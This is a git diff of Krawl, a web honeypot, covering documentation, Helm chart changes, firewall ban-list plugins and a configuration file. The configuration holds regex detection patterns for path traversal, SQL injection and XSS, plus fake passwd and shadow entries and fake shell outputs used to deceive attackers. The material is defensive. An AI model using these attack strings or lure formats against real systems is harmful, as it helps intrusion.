rotating log files (1MB max, 5 backups each): + +| Logger | File | Content | +|--------|------|---------| +| `krawl.app` | `logs/krawl.log` | Application events, errors | +| `krawl.access` | `logs/access.log` | HTTP access, attack detections | +| `krawl.credentials` | `logs/credentials.log` | Captured login attempts | + +## Docker + +```dockerfile +FROM python:3.11-slim +# Non-root user: krawl:1000 +# Volumes: /app/logs, /app/data, /app/exports +CMD ["uvicorn", "app:app", "--host", "0.0.0.0", "--port", "5000", "--app-dir", "src"] +``` + +## Key Data Flows + +### Honeypot Request + +``` +Client → BanCheck → DeceptionMiddleware → HoneypotRouter + │ + ┌─────────┴──────────┐ + │ tracker.record() │ + │ ├─ in-memory ++ │ + │ ├─ detect attacks │ + │ └─ DB persist │ + └────────────────────┘ +``` + +### Dashboard Load + +``` +Browser → GET /{secret}/ → SSR initial stats + Jinja2 render + → Alpine.js init → HTMX fires hx-get for each table + → User clicks Attacks tab → setTimeout → init Leaflet + Chart.js + → Leaflet fetches /api/all-ips → plots markers + → Chart.js fetches /api/attack-types-stats → renders doughnut +``` + +### IP Enrichment Pipeline + +``` +APScheduler (every 5 min) + └─ fetch_ip_rep.main() + ├─ DB: get unenriched IPs (limit 50) + ├─ ip-api.com → geolocation (country, city, ASN, coords) + ├─ iprep.lcrawl.com → blocklist memberships + └─ DB: update IpStats with enriched data +``` diff --git a/docs/backups.md b/docs/backups.md new file mode 100644 index 0000000..84bf5db --- /dev/null +++ b/docs/backups.md @@ -0,0 +1,10 @@ +# Enable Database Dump Job for Backups + +To enable the database dump job, set the following variables (*config file example*) + +```yaml +backups: + path: "backups" # where backup will be saved + cron: "*/30 * * * *" # frequency of the cronjob + enabled: true +``` diff --git a/docs/canary-token.md b/docs/canary-token.md new file mode 100644 index 0000000..6e6c314 --- /dev/null +++ b/docs/canary-token.md @@ -0,0 +1,10 @@ +# Customizing the Canary Token + +To create a custom canary token, visit https://canarytokens.org + +and generate a "Web bug" canary token. + +This optional token is triggered when a crawler fully traverses the webpage until it reaches 0. At that point, a URL is returned. When this URL is requested, it sends an alert to the user via email, including the visitor's IP address and user agent. + + +To enable this feature, set the canary token URL [using the environment variable](../README.md#configuration-via-enviromental-variables) `KRAWL_CANARY_TOKEN_URL`. diff --git a/docs/dashboard.md b/docs/dashboard.md new file mode 100644 index 0000000..ace7955 --- /dev/null +++ b/docs/dashboard.md @@ -0,0 +1,21 @@ +# Dashboard + +Access the dashboard at `http://:/` + +The dashboard shows: +- Total and unique accesses +- Suspicious activity and attack detection +- Top IPs, paths, user-agents and GeoIP localization +- Real-time monitoring + +The attackers' access to the honeypot endpoint and related suspicious activities (such as failed login attempts) are logged. + +Krawl also implements a scoring system designed to distinguish between malicious and legitimate behavior on the website. + +![dashboard-1](../img/dashboard-1.png) + +The top IP Addresses is shown along with top paths and User Agents + +![dashboard-2](../img/dashboard-2.png) + +![dashboard-3](../img/dashboard-3.png) diff --git a/docs/firewall-exporters.md b/docs/firewall-exporters.md new file mode 100644 index 0000000..85d88cd --- /dev/null +++ b/docs/firewall-exporters.md @@ -0,0 +1,50 @@ +# Firewall exporters documentation + +Firewall export feature is implemented trough a strategy pattern with an abstract class and a series of subclasses that implement the specific export logic for each firewall specific system: + +```mermaid + classDiagram + class FWType{ + +getBanlist() +} +FWType <|-- Raw +class Raw{ } +FWType <|-- Iptables +class Iptables{ } +note for Iptables "implements the getBanlist method for iptables rules" +``` + +Rule sets are generated trough the `top_attacking_ips__export-malicious-ips` that writes down the files in the `exports_path` configuration path. Files are named after the specific firewall that they implement as `[firewall]_banlist.txt` except for raw file that is called `malicious_ips.txt` to support legacy + +## Adding firewalls exporters + +To add a firewall exporter create a new python class in `src/firewall` that implements `FWType` class + +> example with `Yourfirewall` class in the `yourfirewall.py` file +```python +from typing_extensions import override +from firewall.fwtype import FWType + +class Yourfirewall(FWType): + + @override + def getBanlist(self, ips) -> str: + """ + Generate raw list of bad IP addresses. + + Args: + ips: List of IP addresses to ban + + Returns: + String containing raw ips, one per line + """ + if not ips: + return "" + # Add here code implementation +``` + +Then add the following to the `src/server.py` and `src/tasks/top_attacking_ips.py` + +```python +from firewall.yourfirewall import Yourfirewall +``` diff --git a/docs/honeypot.md b/docs/honeypot.md new file mode 100644 index 0000000..6baffab --- /dev/null +++ b/docs/honeypot.md @@ -0,0 +1,52 @@ +# Honeypot + +Below is a complete overview of the Krawl honeypot's capabilities + +## robots.txt +The actual (juicy) robots.txt configuration [is the following](../src/templates/html/robots.txt). + +## Honeypot pages + +### Common Login Attempts +Requests to common admin endpoints (`/admin/`, `/wp-admin/`, `/phpMyAdmin/`) return a fake login page. Any login attempt triggers a 1-second delay to simulate real processing and is fully logged in the dashboard (credentials, IP, headers, timing). + +![admin page](../img/admin-page.png) + +### Common Misconfiguration Paths +Requests to paths like `/backup/`, `/config/`, `/database/`, `/private/`, or `/uploads/` return a fake directory listing populated with "interesting" files, each assigned a random file size to look realistic. + +![directory-page](../img/directory-page.png) + +### Environment File Leakage +The `.env` endpoint exposes fake database connection strings, **AWS API keys**, and **Stripe secrets**. It intentionally returns an error due to the `Content-Type` being `application/json` instead of plain text, mimicking a "juicy" misconfiguration that crawlers and scanners often flag as information leakage. + +### Server Error Information +The `/server` page displays randomly generated fake error information for each known server. + +![server and env page](../img/server-and-env-page.png) + +### API Endpoints with Sensitive Data +The pages `/api/v1/users` and `/api/v2/secrets` show fake users and random secrets in JSON format + +![users and secrets](../img/users-and-secrets.png) + +### Exposed Credential Files +The pages `/credentials.txt` and `/passwords.txt` show fake users and random secrets + +![credentials and passwords](../img/credentials-and-passwords.png) + +### SQL Injection and XSS Detection +Pages such as `/users`, `/search`, `/contact`, `/info`, `/input`, and `/feedback`, along with APIs like `/api/sql` and `/api/database`, are designed to lure attackers into performing attacks such as **SQL injection** or **XSS**. + +![sql injection](../img/sql_injection.png) + +Automated tools like **SQLMap** will receive a different randomized database error on each request, increasing scan noise and confusing the attacker. All detected attacks are logged and displayed in the dashboard. + +### Path Traversal Detection +Krawl detects and responds to **path traversal** attempts targeting common system files like `/etc/passwd`, `/etc/shadow`, or Windows system paths. When an attacker tries to access sensitive files using patterns like `../../../etc/passwd` or encoded variants (`%2e%2e/`, `%252e`), Krawl returns convincing fake file contents with realistic system users, UIDs, GIDs, and shell configurations. This wastes attacker time while logging the full attack pattern. + +### XXE (XML External Entity) Injection +The `/api/xml` and `/api/parser` endpoints accept XML input and are designed to detect **XXE injection** attempts. When attackers try to exploit external entity declarations (`:5000` - -### Add the repository (if applicable) - -```bash -helm repo add krawl https://github.com/BlessedRebuS/Krawl -helm repo update -``` - -### Install from OCI Registry - -```bash -helm install krawl oci://ghcr.io/blessedrebus/krawl-chart --version 0.2.1 -``` - -Or with a specific namespace: - -```bash -helm install krawl oci://ghcr.io/blessedrebus/krawl-chart --version 0.2.1 -n krawl --create-namespace -``` - -### Install the chart locally - -```bash -helm install krawl ./helm -``` - -### Install with custom values - -```bash -helm install krawl ./helm -f values.yaml -``` - -### Install in a specific namespace - -```bash -helm install krawl ./helm -n krawl --create-namespace -``` +Then access the deception server at `http://:5000` ## Configuration @@ -221,16 +149,6 @@ The following table lists the main configuration parameters of the Krawl chart a | `resources.requests.cpu` | CPU request | `100m` | | `resources.requests.memory` | Memory request | `64Mi` | -### Autoscaling - -| Parameter | Description | Default | -|-----------|-------------|---------| -| `autoscaling.enabled` | Enable horizontal pod autoscaling | `false` | -| `autoscaling.minReplicas` | Minimum replicas | `1` | -| `autoscaling.maxReplicas` | Maximum replicas | `1` | -| `autoscaling.targetCPUUtilizationPercentage` | Target CPU utilization | `70` | -| `autoscaling.targetMemoryUtilizationPercentage` | Target memory utilization | `80` | - ### Network Policy | Parameter | Description | Default | @@ -248,68 +166,24 @@ kubectl get secret krawl-server -n krawl-system \ ## Usage Examples -### Basic Installation +You can override individual values with `--set` without a values file: ```bash -helm install krawl ./helm -``` - -### Installation with Custom Domain - -```bash -helm install krawl ./helm \ - --set ingress.hosts[0].host=honeypot.example.com -``` - -### Enable Canary Tokens - -```bash -helm install krawl ./helm \ +helm install krawl oci://ghcr.io/blessedrebus/krawl-chart --version 1.1.0 \ + --set ingress.hosts[0].host=honeypot.example.com \ --set config.canary.token_url=https://canarytokens.com/your-token ``` -### Configure Custom API Endpoint - -```bash -helm install krawl ./helm \ - --set config.api.server_url=https://api.example.com \ - --set config.api.server_port=443 -``` - -### Create Values Override File - -Create `custom-values.yaml`: - -```yaml -config: - server: - port: 8080 - delay: 500 - canary: - token_url: https://your-canary-token-url - dashboard: - secret_path: /super-secret-path - crawl: - max_pages_limit: 500 - ban_duration_seconds: 3600 -``` - -Then install: - -```bash -helm install krawl ./helm -f custom-values.yaml -``` - ## Upgrading ```bash -helm upgrade krawl ./helm +helm upgrade krawl oci://ghcr.io/blessedrebus/krawl-chart --version 1.1.0 -f values.yaml ``` ## Uninstalling ```bash -helm uninstall krawl +helm uninstall krawl -n krawl-system ``` ## Troubleshooting @@ -348,7 +222,6 @@ kubectl logs -l app.kubernetes.io/name=krawl - `configmap.yaml` - Application configuration - `pvc.yaml` - Persistent volume claim - `ingress.yaml` - Ingress configuration - - `hpa.yaml` - Horizontal pod autoscaler - `network-policy.yaml` - Network policies ## Support diff --git a/helm/templates/configmap.yaml b/helm/templates/configmap.yaml index f81d319..73ffbb5 100644 --- a/helm/templates/configmap.yaml +++ b/helm/templates/configmap.yaml @@ -22,6 +22,14 @@ data: token_tries: {{ .Values.config.canary.token_tries }} dashboard: secret_path: {{ .Values.config.dashboard.secret_path | toYaml }} + backups: + path: {{ .Values.config.backups.path | quote }} + cron: {{ .Values.config.backups.cron | quote }} + enabled: {{ .Values.config.backups.enabled }} + exports: + path: {{ .Values.config.exports.path | quote }} + logging: + level: {{ .Values.config.logging.level | quote }} database: path: {{ .Values.config.database.path | quote }} retention_days: {{ .Values.config.database.retention_days }} diff --git a/helm/templates/deployment.yaml b/helm/templates/deployment.yaml index f24261c..730f774 100644 --- a/helm/templates/deployment.yaml +++ b/helm/templates/deployment.yaml @@ -5,9 +5,9 @@ metadata: labels: {{- include "krawl.labels" . | nindent 4 }} spec: - {{- if not .Values.autoscaling.enabled }} replicas: {{ .Values.replicaCount }} - {{- end }} + strategy: + type: Recreate selector: matchLabels: {{- include "krawl.selectorLabels" . | nindent 6 }} @@ -29,7 +29,7 @@ spec: {{- toYaml . | nindent 8 }} {{- end }} containers: - - name: {{ .Chart.Name }} + - name: krawl {{- with .Values.securityContext }} securityContext: {{- toYaml . | nindent 12 }} diff --git a/helm/templates/hpa.yaml b/helm/templates/hpa.yaml deleted file mode 100644 index 0f64b10..0000000 --- a/helm/templates/hpa.yaml +++ /dev/null @@ -1,32 +0,0 @@ -{{- if .Values.autoscaling.enabled }} -apiVersion: autoscaling/v2 -kind: HorizontalPodAutoscaler -metadata: - name: {{ include "krawl.fullname" . }} - labels: - {{- include "krawl.labels" . | nindent 4 }} -spec: - scaleTargetRef: - apiVersion: apps/v1 - kind: Deployment - name: {{ include "krawl.fullname" . }} - minReplicas: {{ .Values.autoscaling.minReplicas }} - maxReplicas: {{ .Values.autoscaling.maxReplicas }} - metrics: - {{- if .Values.autoscaling.targetCPUUtilizationPercentage }} - - type: Resource - resource: - name: cpu - target: - type: Utilization - averageUtilization: {{ .Values.autoscaling.targetCPUUtilizationPercentage }} - {{- end }} - {{- if .Values.autoscaling.targetMemoryUtilizationPercentage }} - - type: Resource - resource: - name: memory - target: - type: Utilization - averageUtilization: {{ .Values.autoscaling.targetMemoryUtilizationPercentage }} - {{- end }} -{{- end }} diff --git a/helm/values.yaml b/helm/values.yaml index fb9be82..8b4a907 100644 --- a/helm/values.yaml +++ b/helm/values.yaml @@ -3,7 +3,7 @@ replicaCount: 1 image: repository: ghcr.io/blessedrebus/krawl pullPolicy: Always - tag: "1.0.0" + tag: "1.1.0" imagePullSecrets: [] nameOverride: "krawl" @@ -54,13 +54,6 @@ resources: # If not set, container will use its default timezone timezone: "" -autoscaling: - enabled: false - minReplicas: 1 - maxReplicas: 1 - targetCPUUtilizationPercentage: 70 - targetMemoryUtilizationPercentage: 80 - nodeSelector: {} tolerations: [] @@ -84,6 +77,14 @@ config: token_tries: 10 dashboard: secret_path: null # Auto-generated if not set, or set to "/my-secret-dashboard" + backups: + path: "backups" + enabled: false + cron: "*/30 * * * *" + exports: + path: "exports" + logging: + level: "INFO" # DEBUG, INFO, WARNING, ERROR, CRITICAL database: path: "data/krawl.db" retention_days: 30 @@ -307,6 +308,295 @@ wordlists: - .git/ - keys/ - credentials/ + fake_files: + - name: settings.conf + size_min: 1024 + size_max: 8192 + perms: "-rw-r--r--" + - name: database.sql + size_min: 10240 + size_max: 102400 + perms: "-rw-r--r--" + - name: .htaccess + size_min: 256 + size_max: 1024 + perms: "-rw-r--r--" + - name: README.md + size_min: 512 + size_max: 2048 + perms: "-rw-r--r--" + fake_directories: + - name: config + size: "4096" + perms: drwxr-xr-x + - name: backup + size: "4096" + perms: drwxr-xr-x + - name: logs + size: "4096" + perms: drwxrwxr-x + - name: data + size: "4096" + perms: drwxr-xr-x + fake_passwd: + system_users: + - "root:x:0:0:root:/root:/bin/bash" + - "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + - "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + - "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + - "sync:x:4:65534:sync:/bin:/bin/sync" + - "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + - "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + - "mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false" + - "sshd:x:109:65534::/run/sshd:/usr/sbin/nologin" + uid_min: 1000 + uid_max: 2000 + gid_min: 1000 + gid_max: 2000 + shells: + - /bin/bash + - /bin/sh + - /usr/bin/zsh + fake_shadow: + system_entries: + - "root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::" + - "daemon:*:19000:0:99999:7:::" + - "bin:*:19000:0:99999:7:::" + - "sys:*:19000:0:99999:7:::" + - "www-data:*:19000:0:99999:7:::" + hash_prefix: "$6$rounds=656000$" + salt_length: 16 + hash_length: 86 + xxe_responses: + file_access: + template: | + + + success + {content} + + entity_processed: + template: | + + + success + Entity processed successfully + {entity_value} + + entity_values: + - "admin_credentials" + - "database_connection" + - "api_secret_key" + - "internal_server_ip" + - "encrypted_password" + error: + template: | + + + error + {message} + + messages: + - "External entity not allowed" + - "XML parsing error" + - "Invalid entity reference" + default_content: "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + command_outputs: + id: + - "uid={uid}(www-data) gid={gid}(www-data) groups={gid}(www-data)" + - "uid={uid}(nginx) gid={gid}(nginx) groups={gid}(nginx)" + - "uid={uid}(apache) gid={gid}(apache) groups={gid}(apache)" + whoami: + - www-data + - nginx + - apache + - webapp + - nobody + uname: + - "Linux webserver 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux" + - "Linux app-server 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 GNU/Linux" + - "Linux prod-server 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux" + pwd: + - /var/www/html + - /home/webapp/public_html + - /usr/share/nginx/html + - /opt/app/public + ls: + - ["index.php", "config.php", "uploads", "assets", "README.md", ".htaccess", "admin"] + - ["app.js", "package.json", "node_modules", "public", "views", "routes"] + - ["index.html", "css", "js", "images", "data", "api"] + cat_config: | + + network_commands: + - "bash: wget: command not found" + - "curl: (6) Could not resolve host: example.com" + - "Connection timeout" + - "bash: nc: command not found" + - "Downloaded {size} bytes" + generic: + - "sh: 1: syntax error: unexpected end of file" + - "Command executed successfully" + - "" + - "/bin/sh: {num}: not found" + - "bash: command not found" + uid_min: 1000 + uid_max: 2000 + gid_min: 1000 + gid_max: 2000 + download_size_min: 100 + download_size_max: 10000 + sql_errors: + mysql: + syntax_errors: + - "You have an error in your SQL syntax" + - "check the manual that corresponds to your MySQL server version" + table_errors: + - "Table '{table}' doesn't exist" + - "Unknown table '{table}'" + column_errors: + - "Unknown column '{column}' in 'field list'" + - "Unknown column '{column}' in 'where clause'" + postgresql: + syntax_errors: + - "ERROR: syntax error at or near" + - "ERROR: unterminated quoted string" + relation_errors: + - "ERROR: relation \"{table}\" does not exist" + column_errors: + - "ERROR: column \"{column}\" does not exist" + mssql: + syntax_errors: + - "Incorrect syntax near" + - "Unclosed quotation mark" + object_errors: + - "Invalid object name '{table}'" + column_errors: + - "Invalid column name '{column}'" + oracle: + syntax_errors: + - "ORA-00933: SQL command not properly ended" + - "ORA-00904: invalid identifier" + table_errors: + - "ORA-00942: table or view does not exist" + sqlite: + syntax_errors: + - "near \"{token}\": syntax error" + table_errors: + - "no such table: {table}" + column_errors: + - "no such column: {column}" + mongodb: + query_errors: + - "Failed to parse" + - "unknown operator" + collection_errors: + - "ns not found" + server_errors: + nginx: + versions: + - "1.18.0" + - "1.20.1" + - "1.22.0" + - "1.24.0" + template: | + + + + {code} {message} + + + +

An error occurred.

+

Sorry, the page you are looking for is currently unavailable.
+ Please try again later.

+

If you are the system administrator of this resource then you should check the error log for details.

+

Faithfully yours, nginx/{version}.

+ + + apache: + versions: + - "2.4.41" + - "2.4.52" + - "2.4.54" + - "2.4.57" + os: + - Ubuntu + - Debian + - CentOS + template: | + + + {code} {message} + +

{message}

+

The requested URL was not found on this server.

+
+
Apache/{version} ({os}) Server at {host} Port 80
+ + iis: + versions: + - "10.0" + - "8.5" + - "8.0" + template: | + + + + + {code} - {message} + + + +
+

{code} - {message}

+

The page cannot be displayed because an internal server error has occurred.

+
+ + + attack_patterns: + path_traversal: "(\\.\\.| %2e%2e|%252e|/etc/passwd|/etc/shadow|\\.\\.\\\\/|\\.\\./|/windows/system32|c:\\\\windows|/proc/self|\\.\\.\\.%2f|\\.\\.\\.%5c|etc/passwd|etc/shadow)" + sql_injection: "('|\"|`|--|#|/\\*|\\*/|\\bunion\\b|\\bunion\\s+select\\b|\\bor\\b.*=.*|\\band\\b.*=.*|'.*or.*'.*=.*'|\\bsleep\\b|\\bwaitfor\\b|\\bdelay\\b|\\bbenchmark\\b|;.*select|;.*drop|;.*insert|;.*update|;.*delete|\\bexec\\b|\\bexecute\\b|\\bxp_cmdshell\\b|information_schema|table_schema|table_name)" + xss_attempt: "($ +``` + +**Explanation:** The filter matches any line that contains only an IP address (`` is fail2ban's placeholder for IP addresses). In this case, we use **one IP per row** as a result of the Krawl detection engine for attackers. + +### 2. Create the Jail Configuration [krawl-jail.conf](krawl-jail.conf) +### 2.1 Krawl is on the same host +Create `/etc/fail2ban/jail.d/krawl-jail.conf` and replace the `logpath` with the path to the krawl `malicious_ips.txt`: + +```ini +[krawl] +enabled = true +filter = krawl +logpath = /path/to/malicious_ips.txt +backend = auto +maxretry = 1 +findtime = 1 +bantime = 2592000 +action = iptables-allports[name=krawl-ban, port=all, protocol=all] +``` +### 2.2 Krawl is on a different host + +If Krawl is deployed on another instance, you can use the Krawl API to get malicious IPs via a **curl** command scheduled with **cron**. + +```bash +curl http://your-krawl-instance/dashboard-path/api/get_banlist?fwtype=raw -o malicious_ips.txt +``` + +#### Cron Setup + +Edit your crontab to refresh the malicious IPs list: + +```bash +sudo crontab -e +``` + +Add this single cron job to fetch malicious IPs every hour: + +```bash +0 * * * * curl http://your-krawl-instance/dashboard-path/api/get_banlist?fwtype=raw -o /tmp/malicious_ips.txt +``` + +Replace the `krawl-jail.conf` **logpath** with `/tmp/malicious_ips.txt`. + +### 3. Reload Fail2Ban + +```bash +sudo systemctl restart fail2ban +``` + +Verify the jail is active: + +```bash +sudo fail2ban-client status krawl +``` + +## How It Works + +### When an IP is Added to malicious_ips.txt + +1. **Fail2ban detects the new line** in the log file (via inotify) +2. **Filter regex matches** the IP address pattern +3. **maxretry check:** Since maxretry=1, ban immediately +4. **Action triggered:** `iptables-allports` adds a firewall block rule +5. **IP is blocked** on all ports and protocols + +### When the 30-Day Rotation Occurs + +Your malicious IPs file is rotated every 30 days. With `bantime = 2592000` (30 days): + +If you used `bantime = -1` (permanent), old IPs would remain banned forever even after removal from the file. This option is not recommended because external IPs can rotate and are unlikely to be static. + +## Monitoring + +### Check Currently Banned IPs + +```bash +sudo fail2ban-client status krawl +``` + +### View Fail2Ban Logs + +```bash +sudo tail -f /var/log/fail2ban.log | grep krawl +``` + +## Management Commands + +### Manually Ban an IP + +```bash +sudo fail2ban-client set krawl banip 192.168.1.100 +``` + +### Manually Unban an IP + +```bash +sudo fail2ban-client set krawl unbanip 192.168.1.100 +``` + + +### Clear All Bans in Krawl Jail + +```bash +sudo fail2ban-client set krawl unbanall +``` + +### Restart the Krawl Jail Only + +```bash +sudo fail2ban-client restart krawl +``` + +## References + +- [Fail2Ban Documentation](https://www.fail2ban.org/wiki/index.php/Main_Page) +- [Fail2Ban Configuration Manual](https://www.fail2ban.org/wiki/index.php/Jail.conf) +- [Iptables Basics](https://www.digitalocean.com/community/tutorials/iptables-essentials-common-firewall-rules-and-commands) diff --git a/plugins/fail2ban/krawl-filter.conf b/plugins/fail2ban/krawl-filter.conf new file mode 100644 index 0000000..ee1bbad --- /dev/null +++ b/plugins/fail2ban/krawl-filter.conf @@ -0,0 +1,2 @@ +[Definition] +failregex = ^$ \ No newline at end of file diff --git a/plugins/fail2ban/krawl-jail.conf b/plugins/fail2ban/krawl-jail.conf new file mode 100644 index 0000000..61b5e44 --- /dev/null +++ b/plugins/fail2ban/krawl-jail.conf @@ -0,0 +1,9 @@ +[krawl] +enabled = true +filter = krawl +logpath = /path/to/malicious_ips.txt ; update this path to where your krawl malicious IPs are logged +backend = auto +maxretry = 1 +findtime = 1 +bantime = 2592000 ; 30 days +action = iptables-allports[name=krawl-ban, port=all, protocol=all] \ No newline at end of file diff --git a/plugins/iptables/README.md b/plugins/iptables/README.md new file mode 100644 index 0000000..a71b3b4 --- /dev/null +++ b/plugins/iptables/README.md @@ -0,0 +1,302 @@ +# Iptables + Krawl Integration + +## Overview + +This guide explains how to integrate **iptables** with Krawl to automatically block detected malicious IPs at the firewall level. The iptables integration fetches the malicious IP list directly from Krawl's API and applies firewall rules. + +## Architecture + +``` +Krawl detects malicious IPs + ↓ +Stores in database + ↓ +API endpoint + ↓ +Cron job fetches list + ↓ +Iptables firewall blocks IPs + ↓ +All traffic from banned IPs dropped +``` + +## Prerequisites + +- Linux system with iptables installed (typically pre-installed) +- Krawl running with API accessible +- Root/sudo access +- Curl or wget for HTTP requests +- Cron for scheduling (or systemd timer as alternative) + +## Installation & Setup + +### 1. Create the [krawl-iptables.sh](krawl-iptables.sh) script + +```bash +#!/bin/bash + +curl -s https://your-krawl-instance/your-dashboard-path/api/get_banlist?fwtype=iptables | while read ip; do + iptables -C INPUT -s "$ip" -j DROP || iptables -A INPUT -s "$ip" -j DROP; +done +``` + +Make it executable: +```bash +sudo chmod +x ./krawl-iptables.sh +``` + +### 2. Test the Script + +```bash +sudo ./krawl-iptables.sh +``` + +### 3. Schedule with Cron + +Edit root crontab: +```bash +sudo crontab -e +``` + +Add this line to sync IPs every hour: + +```bash +0 * * * * /path/to/krawl-iptables.sh +``` + +## How It Works + +### When the Script Runs + +1. **Fetch IPs** from Krawl API (`/api/get_banlist?fwtype=iptables`) +2. **Add new DROP rules** for each IP +3. **Rules are applied immediately** at kernel level + +## Monitoring + +### Check Active Rules + +View all KRAWL-BAN rules: +```bash +sudo iptables -L KRAWL-BAN -n +``` + +Count blocked IPs: +```bash +sudo iptables -L KRAWL-BAN -n | tail -n +3 | wc -l +``` + +### Check Script Logs + +```bash +sudo tail -f /var/log/krawl-iptables-sync.log +``` + +### Monitor in Real-Time + +Watch dropped packets (requires kernel logging): +```bash +sudo tail -f /var/log/syslog | grep "IN=.*OUT=" +``` + +## Management Commands + +### Manually Block an IP + +```bash +sudo iptables -A KRAWL-BAN -s 192.168.1.100 -j DROP +``` + +### Manually Unblock an IP + +```bash +sudo iptables -D KRAWL-BAN -s 192.168.1.100 -j DROP +``` + +### List All Blocked IPs + +```bash +sudo iptables -L KRAWL-BAN -n | grep DROP +``` + +### Clear All Rules + +```bash +sudo iptables -F KRAWL-BAN +``` + +### Disable the Chain (Temporarily) + +```bash +sudo iptables -D INPUT -j KRAWL-BAN +``` + +### Re-enable the Chain + +```bash +sudo iptables -I INPUT -j KRAWL-BAN +``` + +### View Statistics + +```bash +sudo iptables -L KRAWL-BAN -n -v +``` + +## Persistent Rules (Survive Reboot) + +### Save Current Rules + +```bash +sudo iptables-save > /etc/iptables/rules.v4 +``` + +### Restore on Boot + +Install iptables-persistent: +```bash +sudo apt-get install iptables-persistent +``` + +During installation, choose "Yes" to save current IPv4 and IPv6 rules. + +To update later: +```bash +sudo iptables-save > /etc/iptables/rules.v4 +sudo systemctl restart iptables +``` + +## Performance Considerations + +### For Your Setup + +- **Minimal overhead** — Iptables rules are processed at kernel level (very fast) +- **No logging I/O** — Blocked IPs are dropped before application sees them +- **Scales to thousands** — Iptables can efficiently handle 10,000+ rules + +### Optimization Tips + +1. **Use a custom chain** — Isolates Krawl rules from other firewall rules +2. **Schedule appropriately** — Every hour is usually sufficient; adjust based on threat level +3. **Monitor rule count** — Check periodically to ensure the script is working +4. **Consider IPSET** — For 10,000+ IPs, use ipset instead (more efficient) + +### Using IPSET (Advanced) + +For large-scale deployments, ipset is more efficient than individual iptables rules: + +```bash +# Create ipset +sudo ipset create krawl-ban hash:ip + +# Add IPs to ipset +while read ip; do + sudo ipset add krawl-ban "$ip" +done + +# Single iptables rule references the ipset +sudo iptables -I INPUT -m set --match-set krawl-ban src -j DROP +``` + +## Troubleshooting + +### Script Says "Failed to fetch IP list" + +Check API connectivity: +```bash +curl http://your-krawl-instance/api/get_banlist?fwtype=iptables +``` + +Verify: +- Krawl is running +- API URL is correct +- Firewall allows outbound HTTPS/HTTP +- No authentication required + +### Iptables Rules Not Persisting After Reboot + +Install and configure iptables-persistent: +```bash +sudo apt-get install iptables-persistent +sudo iptables-save > /etc/iptables/rules.v4 +``` + +### Script Runs but No Rules Added + +Check if chain exists: +```bash +sudo iptables -L KRAWL-BAN -n 2>&1 | head -1 +``` + +Check logs for errors: +```bash +sudo grep ERROR /var/log/krawl-iptables-sync.log +``` + +Verify IP format in Krawl API response: +```bash +curl http://your-krawl-instance/api/get_banlist?fwtype=iptables | head -10 +``` + +### Blocked Legitimate Traffic + +Check what IPs are blocked: +```bash +sudo iptables -L KRAWL-BAN -n | grep -E [0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} +``` + +Unblock an IP: +```bash +sudo iptables -D KRAWL-BAN -s 203.0.113.50 -j DROP +``` + +Report false positive to Krawl administrators. + +## Security Best Practices + +1. **Limit API access** — Restrict `/api/get_banlist` to trusted networks (if internal use) +2. **Use HTTPS** — Fetch from HTTPS endpoint if available +3. **Verify TLS certificates** — Add `-k` only if necessary, not by default +4. **Rate limit cron jobs** — Don't run too frequently to avoid DoS +5. **Monitor sync logs** — Alert on repeated failures +6. **Backup rules** — Periodically backup `/etc/iptables/rules.v4` + +## Integration with Krawl Workflow + +Combined with fail2ban and iptables: + +``` +Real-time events (fail2ban) + ↓ +Immediate IP bans (temporary) + ↓ +Hourly sync (iptables cron) + ↓ +Permanent block until next rotation + ↓ +30-day cleanup cycle +``` + +## Manual Integration Example + +Instead of cron, manually fetch and block: + +```bash +# Fetch malicious IPs +curl -s http://your-krawl-instance/api/get_banlist?fwtype=iptables > /tmp/malicious_ips.txt + +# Read and block each IP +while read ip; do + sudo iptables -A KRAWL-BAN -s "$ip" -j DROP +done < /tmp/malicious_ips.txt + +# Save rules +sudo iptables-save > /etc/iptables/rules.v4 +``` + +## References + +- [Iptables Man Page](https://linux.die.net/man/8/iptables) +- [Iptables Essentials](https://www.digitalocean.com/community/tutorials/iptables-essentials-common-firewall-rules-and-commands) +- [Ipset Documentation](https://ipset.netfilter.org/) +- [Linux Firewall Administration Guide](https://www.kernel.org/doc/html/latest/networking/nf_conntrack-sysctl.html) diff --git a/plugins/iptables/krawl-iptables.sh b/plugins/iptables/krawl-iptables.sh new file mode 100644 index 0000000..4239661 --- /dev/null +++ b/plugins/iptables/krawl-iptables.sh @@ -0,0 +1,6 @@ +#!/bin/bash +# This script fetches a list of malicious IPs from your Krawl instance and adds them to the iptables firewall to block incoming traffic from those IPs. + +curl -s https://your-krawl-instance/api/get_banlist?fwtype=iptables | while read ip; do + iptables -C INPUT -s "$ip" -j DROP || iptables -A INPUT -s "$ip" -j DROP; +done \ No newline at end of file diff --git a/plugins/nftables/README.md b/plugins/nftables/README.md new file mode 100644 index 0000000..0c49678 --- /dev/null +++ b/plugins/nftables/README.md @@ -0,0 +1,161 @@ +# Nftables + Krawl Integration + +## Overview + +This guide explains how to integrate **nftables** with Krawl to automatically block detected malicious IPs at the firewall level. Nftables is the modern replacement for iptables on newer Linux systems and provides more efficient IP set-based blocking. + +## Architecture + +``` +Krawl detects malicious IPs + ↓ +Stores in database + ↓ +API endpoint + ↓ +Cron job fetches list + ↓ +Nftables firewall blocks IPs + ↓ +All traffic from banned IPs dropped +``` + +## Prerequisites + +- Modern Linux system with nftables installed (Ubuntu 22+, Debian 12+, RHEL 9+) +- Krawl running with API accessible +- Root/sudo access +- Curl for HTTP requests +- Cron for scheduling + +## When to Use Nftables + +Check if your system uses nftables: + +```bash +sudo nft list tables +``` + +If this shows tables, you're using nftables. If you get command not found, use iptables instead. + +## Installation & Setup + +### 1. Create the [krawl-nftables.sh](krawl-nftables.sh) script + +```bash +#!/bin/bash + 